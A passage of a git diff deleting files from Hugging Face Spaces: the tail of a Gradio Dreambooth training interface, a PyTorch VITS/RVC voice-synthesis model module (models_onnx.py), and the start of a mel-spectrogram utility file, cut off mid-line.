    - For it to work, you have to duplicate the Space and run it on your own profile where a (paid) private GPU will be attributed to it during runtime. As each T4 costs US$0.60/h, it should cost < US$1 to train a model with less than 100 images on default settings!
    - ''') - else: - gr.HTML(''' -
    - You have successfully cloned the Dreambooth Training Space
    - If you haven't already, attribute a T4 GPU to it (via the Settings tab) and run the training below. You will be billed by the minute from when you activate the GPU until when you turn it off.
    - ''') - gr.Markdown("# Dreambooth training") - gr.Markdown("Customize Stable Diffusion by giving it with few-shot examples") - with gr.Row(): - type_of_thing = gr.Dropdown(label="What would you like to train?", choices=["object", "person", "style"], value="object", interactive=True) - - with gr.Row(): - with gr.Column(): - thing_description = gr.Markdown("You are going to train an `object`, upload 5-10 images of the object you are planning on training on from different angles/perspectives. You must have the right to do so and you are liable for the images you use, example:") - thing_image_example = gr.HTML('''''') - things_naming = gr.Markdown("You should name your concept with a unique made up word that has low chance of the model already knowing it (e.g.: `cttoy` here). Images will be automatically cropped to 512x512.") - with gr.Column(): - file_collection = [] - concept_collection = [] - buttons_collection = [] - delete_collection = [] - is_visible = [] - - row = [None] * maximum_concepts - for x in range(maximum_concepts): - ordinal = lambda n: "%d%s" % (n, "tsnrhtdd"[(n // 10 % 10 != 1) * (n % 10 < 4) * n % 10::4]) - if(x == 0): - visible = True - is_visible.append(gr.State(value=True)) - else: - visible = False - is_visible.append(gr.State(value=False)) - - file_collection.append(gr.File(label=f"Upload the images for your {ordinal(x+1)} concept", file_count="multiple", interactive=True, visible=visible)) - with gr.Column(visible=visible) as row[x]: - concept_collection.append(gr.Textbox(label=f"{ordinal(x+1)} concept prompt - use a unique, made up word to avoid collisions")) - with gr.Row(): - if(x < maximum_concepts-1): - buttons_collection.append(gr.Button(value="Add +1 concept", visible=visible)) - if(x > 0): - delete_collection.append(gr.Button(value=f"Delete {ordinal(x+1)} concept")) - - counter_add = 1 - for button in buttons_collection: - if(counter_add < len(buttons_collection)): - button.click(lambda: - [gr.update(visible=True),gr.update(visible=True), gr.update(visible=False), gr.update(visible=True), True, None], - None, - [row[counter_add], file_collection[counter_add], buttons_collection[counter_add-1], buttons_collection[counter_add], is_visible[counter_add], file_collection[counter_add]], queue=False) - else: - button.click(lambda:[gr.update(visible=True),gr.update(visible=True), gr.update(visible=False), True], None, [row[counter_add], file_collection[counter_add], buttons_collection[counter_add-1], is_visible[counter_add]], queue=False) - counter_add += 1 - - counter_delete = 1 - for delete_button in delete_collection: - if(counter_delete < len(delete_collection)+1): - delete_button.click(lambda:[gr.update(visible=False),gr.update(visible=False), gr.update(visible=True), False], None, [file_collection[counter_delete], row[counter_delete], buttons_collection[counter_delete-1], is_visible[counter_delete]], queue=False) - counter_delete += 1 - - - - with gr.Accordion("Custom Settings", open=False): - swap_auto_calculated = gr.Checkbox(label="Use custom settings") - gr.Markdown("If not checked, the number of steps and % of frozen encoder will be tuned automatically according to the amount of images you upload and whether you are training an `object`, `person` or `style` as follows: The number of steps is calculated by number of images uploaded multiplied by 20. 
The text-encoder is frozen after 10% of the steps for a style, 30% of the steps for an object and is fully trained for persons.") - steps = gr.Number(label="How many steps", value=800) - perc_txt_encoder = gr.Number(label="Percentage of the training steps the text-encoder should be trained as well", value=30) - - type_of_thing.change(fn=swap_text, inputs=[type_of_thing], outputs=[thing_description, thing_image_example, things_naming, perc_txt_encoder], queue=False) - training_summary = gr.Textbox("", visible=False, label="Training Summary") - steps.change(fn=count_files, inputs=file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[training_summary], queue=False) - perc_txt_encoder.change(fn=count_files, inputs=file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[training_summary], queue=False) - for file in file_collection: - file.change(fn=count_files, inputs=file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[training_summary], queue=False) - train_btn = gr.Button("Start Training") - with gr.Box(visible=False) as try_your_model: - gr.Markdown("## Try your model") - with gr.Row(): - prompt = gr.Textbox(label="Type your prompt") - result_image = gr.Image() - generate_button = gr.Button("Generate Image") - with gr.Box(visible=False) as push_to_hub: - gr.Markdown("## Push to Hugging Face Hub") - model_name = gr.Textbox(label="Name of your model", placeholder="Tarsila do Amaral Style") - where_to_upload = gr.Dropdown(["My personal profile", "Public Library"], label="Upload to") - gr.Markdown("[A Hugging Face write access token](https://huggingface.co/settings/tokens), go to \"New token\" -> Role : Write. A regular read token won't work here.") - hf_token = gr.Textbox(label="Hugging Face Write Token") - push_button = gr.Button("Push to the Hub") - result = gr.File(label="Download the uploaded models in the diffusers format", visible=True) - success_message_upload = gr.Markdown(visible=False) - convert_button = gr.Button("Convert to CKPT", visible=False) - - train_btn.click(fn=train, inputs=is_visible+concept_collection+file_collection+[type_of_thing]+[steps]+[perc_txt_encoder]+[swap_auto_calculated], outputs=[result, try_your_model, push_to_hub, convert_button]) - generate_button.click(fn=generate, inputs=prompt, outputs=result_image) - push_button.click(fn=push, inputs=[model_name, where_to_upload, hf_token], outputs=[success_message_upload, result]) - convert_button.click(fn=convert_to_ckpt, inputs=[], outputs=result) -demo.launch() \ No newline at end of file diff --git a/spaces/ServerX/PorcoDiaz/infer/lib/infer_pack/models_onnx.py b/spaces/ServerX/PorcoDiaz/infer/lib/infer_pack/models_onnx.py deleted file mode 100644 index 3e99763bf3ed7988eb2ae33d9066f85d37adf119..0000000000000000000000000000000000000000 --- a/spaces/ServerX/PorcoDiaz/infer/lib/infer_pack/models_onnx.py +++ /dev/null @@ -1,824 +0,0 @@ -import math -import logging - -logger = logging.getLogger(__name__) - -import numpy as np -import torch -from torch import nn -from torch.nn import AvgPool1d, Conv1d, Conv2d, ConvTranspose1d -from torch.nn import functional as F -from torch.nn.utils import remove_weight_norm, spectral_norm, weight_norm - -from infer.lib.infer_pack import attentions, commons, modules -from infer.lib.infer_pack.commons import get_padding, init_weights - - -class TextEncoder256(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - 
kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(256, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class TextEncoder768(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(768, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class ResidualCouplingBlock(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0, - ): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append( - modules.ResidualCouplingLayer( - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - mean_only=True, - ) - ) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - def remove_weight_norm(self): - for i in range(self.n_flows): - self.flows[i * 2].remove_weight_norm() - - 
-class PosteriorEncoder(nn.Module): - def __init__( - self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN( - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - def remove_weight_norm(self): - self.enc.remove_weight_norm() - - -class Generator(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=0, - ): - super(Generator, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - def forward(self, x, g=None): - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -class SineGen(torch.nn.Module): - """Definition of sine generator - SineGen(samp_rate, harmonic_num = 0, - sine_amp = 0.1, noise_std = 0.003, - voiced_threshold = 0, - flag_for_pulse=False) - samp_rate: sampling rate in Hz - harmonic_num: number of harmonic overtones (default 0) - sine_amp: amplitude of sine-wavefrom (default 0.1) - noise_std: std of Gaussian noise (default 0.003) - voiced_thoreshold: F0 threshold for U/V classification (default 0) - flag_for_pulse: this SinGen is used inside PulseGen (default False) - Note: when flag_for_pulse is 
True, the first time step of a voiced - segment is always sin(np.pi) or cos(0) - """ - - def __init__( - self, - samp_rate, - harmonic_num=0, - sine_amp=0.1, - noise_std=0.003, - voiced_threshold=0, - flag_for_pulse=False, - ): - super(SineGen, self).__init__() - self.sine_amp = sine_amp - self.noise_std = noise_std - self.harmonic_num = harmonic_num - self.dim = self.harmonic_num + 1 - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - - def _f02uv(self, f0): - # generate uv signal - uv = torch.ones_like(f0) - uv = uv * (f0 > self.voiced_threshold) - return uv - - def forward(self, f0, upp): - """sine_tensor, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output sine_tensor: tensor(batchsize=1, length, dim) - output uv: tensor(batchsize=1, length, 1) - """ - with torch.no_grad(): - f0 = f0[:, None].transpose(1, 2) - f0_buf = torch.zeros(f0.shape[0], f0.shape[1], self.dim, device=f0.device) - # fundamental component - f0_buf[:, :, 0] = f0[:, :, 0] - for idx in np.arange(self.harmonic_num): - f0_buf[:, :, idx + 1] = f0_buf[:, :, 0] * ( - idx + 2 - ) # idx + 2: the (idx+1)-th overtone, (idx+2)-th harmonic - rad_values = (f0_buf / self.sampling_rate) % 1 ###%1意味着n_har的乘积无法后处理优化 - rand_ini = torch.rand( - f0_buf.shape[0], f0_buf.shape[2], device=f0_buf.device - ) - rand_ini[:, 0] = 0 - rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini - tmp_over_one = torch.cumsum(rad_values, 1) # % 1 #####%1意味着后面的cumsum无法再优化 - tmp_over_one *= upp - tmp_over_one = F.interpolate( - tmp_over_one.transpose(2, 1), - scale_factor=upp, - mode="linear", - align_corners=True, - ).transpose(2, 1) - rad_values = F.interpolate( - rad_values.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose( - 2, 1 - ) ####### - tmp_over_one %= 1 - tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0 - cumsum_shift = torch.zeros_like(rad_values) - cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0 - sine_waves = torch.sin( - torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi - ) - sine_waves = sine_waves * self.sine_amp - uv = self._f02uv(f0) - uv = F.interpolate( - uv.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose(2, 1) - noise_amp = uv * self.noise_std + (1 - uv) * self.sine_amp / 3 - noise = noise_amp * torch.randn_like(sine_waves) - sine_waves = sine_waves * uv + noise - return sine_waves, uv, noise - - -class SourceModuleHnNSF(torch.nn.Module): - """SourceModule for hn-nsf - SourceModule(sampling_rate, harmonic_num=0, sine_amp=0.1, - add_noise_std=0.003, voiced_threshod=0) - sampling_rate: sampling_rate in Hz - harmonic_num: number of harmonic above F0 (default: 0) - sine_amp: amplitude of sine source signal (default: 0.1) - add_noise_std: std of additive Gaussian noise (default: 0.003) - note that amplitude of noise in unvoiced is decided - by sine_amp - voiced_threshold: threhold to set U/V given F0 (default: 0) - Sine_source, noise_source = SourceModuleHnNSF(F0_sampled) - F0_sampled (batchsize, length, 1) - Sine_source (batchsize, length, 1) - noise_source (batchsize, length 1) - uv (batchsize, length, 1) - """ - - def __init__( - self, - sampling_rate, - harmonic_num=0, - sine_amp=0.1, - add_noise_std=0.003, - voiced_threshod=0, - is_half=True, - ): - super(SourceModuleHnNSF, self).__init__() - - self.sine_amp = sine_amp - self.noise_std = add_noise_std - self.is_half = is_half - # to produce sine waveforms - self.l_sin_gen = SineGen( - sampling_rate, harmonic_num, sine_amp, add_noise_std, 
voiced_threshod - ) - - # to merge source harmonics into a single excitation - self.l_linear = torch.nn.Linear(harmonic_num + 1, 1) - self.l_tanh = torch.nn.Tanh() - - def forward(self, x, upp=None): - sine_wavs, uv, _ = self.l_sin_gen(x, upp) - if self.is_half: - sine_wavs = sine_wavs.half() - sine_merge = self.l_tanh(self.l_linear(sine_wavs)) - return sine_merge, None, None # noise, uv - - -class GeneratorNSF(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - sr, - is_half=False, - ): - super(GeneratorNSF, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - - self.f0_upsamp = torch.nn.Upsample(scale_factor=np.prod(upsample_rates)) - self.m_source = SourceModuleHnNSF( - sampling_rate=sr, harmonic_num=0, is_half=is_half - ) - self.noise_convs = nn.ModuleList() - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - c_cur = upsample_initial_channel // (2 ** (i + 1)) - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - if i + 1 < len(upsample_rates): - stride_f0 = np.prod(upsample_rates[i + 1 :]) - self.noise_convs.append( - Conv1d( - 1, - c_cur, - kernel_size=stride_f0 * 2, - stride=stride_f0, - padding=stride_f0 // 2, - ) - ) - else: - self.noise_convs.append(Conv1d(1, c_cur, kernel_size=1)) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - self.upp = np.prod(upsample_rates) - - def forward(self, x, f0, g=None): - har_source, noi_source, uv = self.m_source(f0, self.upp) - har_source = har_source.transpose(1, 2) - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - x_source = self.noise_convs[i](har_source) - x = x + x_source - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -sr2sr = { - "32k": 32000, - "40k": 40000, - "48k": 48000, -} - - -class SynthesizerTrnMsNSFsidM(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr, - version, - **kwargs - ): - super().__init__() - if 
type(sr) == type("strr"): - sr = sr2sr[sr] - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - if version == "v1": - self.enc_p = TextEncoder256( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - else: - self.enc_p = TextEncoder768( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - self.dec = GeneratorNSF( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - sr=sr, - is_half=kwargs["is_half"], - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - self.speaker_map = None - logger.debug( - "gin_channels: " - + gin_channels - + ", self.spk_embed_dim: " - + self.spk_embed_dim - ) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def construct_spkmixmap(self, n_speaker): - self.speaker_map = torch.zeros((n_speaker, 1, 1, self.gin_channels)) - for i in range(n_speaker): - self.speaker_map[i] = self.emb_g(torch.LongTensor([[i]])) - self.speaker_map = self.speaker_map.unsqueeze(0) - - def forward(self, phone, phone_lengths, pitch, nsff0, g, rnd, max_len=None): - if self.speaker_map is not None: # [N, S] * [S, B, 1, H] - g = g.reshape((g.shape[0], g.shape[1], 1, 1, 1)) # [N, S, B, 1, 1] - g = g * self.speaker_map # [N, S, B, 1, H] - g = torch.sum(g, dim=1) # [N, 1, B, 1, H] - g = g.transpose(0, -1).transpose(0, -2).squeeze(0) # [B, H, N] - else: - g = g.unsqueeze(0) - g = self.emb_g(g).transpose(1, 2) - - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * rnd) * x_mask - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec((z * x_mask)[:, :, :max_len], nsff0, g=g) - return o - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2, 3, 5, 7, 11, 17] - # periods = [3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - 
y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class MultiPeriodDiscriminatorV2(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminatorV2, self).__init__() - # periods = [2, 3, 5, 7, 11, 17] - periods = [2, 3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ] - ) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f( - Conv2d( - 1, - 32, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 32, - 128, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 128, - 512, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 512, - 1024, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 1024, - 1024, - (kernel_size, 1), - 1, - padding=(get_padding(kernel_size, 1), 0), - ) - ), - ] - ) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap diff --git a/spaces/Sky5408er/vits-uma-genshin-honkai/mel_processing.py b/spaces/Sky5408er/vits-uma-genshin-honkai/mel_processing.py deleted file mode 100644 index 3e252e76320522a8a4195a60665168f22769aec2..0000000000000000000000000000000000000000 --- 
a/spaces/Sky5408er/vits-uma-genshin-honkai/mel_processing.py +++ /dev/null @@ -1,101 +0,0 @@ -import torch -import torch.utils.data -from librosa.filters import mel as librosa_mel_fn - -MAX_WAV_VALUE = 32768.0 - - -def dynamic_range_compression_torch(x, C=1, clip_val=1e-5): - """ - PARAMS - ------ - C: compression factor - """ - return torch.log(torch.clamp(x, min=clip_val) * C) - - -def dynamic_range_decompression_torch(x, C=1): - """ - PARAMS - ------ - C: compression factor used to compress - """ - return torch.exp(x) / C - - -def spectral_normalize_torch(magnitudes): - output = dynamic_range_compression_torch(magnitudes) - return output - - -def spectral_de_normalize_torch(magnitudes): - output = dynamic_range_decompression_torch(magnitudes) - return output - - -mel_basis = {} -hann_window = {} - - -def spectrogram_torch(y, n_fft, sampling_rate, hop_size, win_size, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - return spec - - -def spec_to_mel_torch(spec, n_fft, num_mels, sampling_rate, fmin, fmax): - global mel_basis - dtype_device = str(spec.dtype) + '_' + str(spec.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=spec.dtype, device=spec.device) - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - return spec - - -def mel_spectrogram_torch(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global mel_basis, hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, 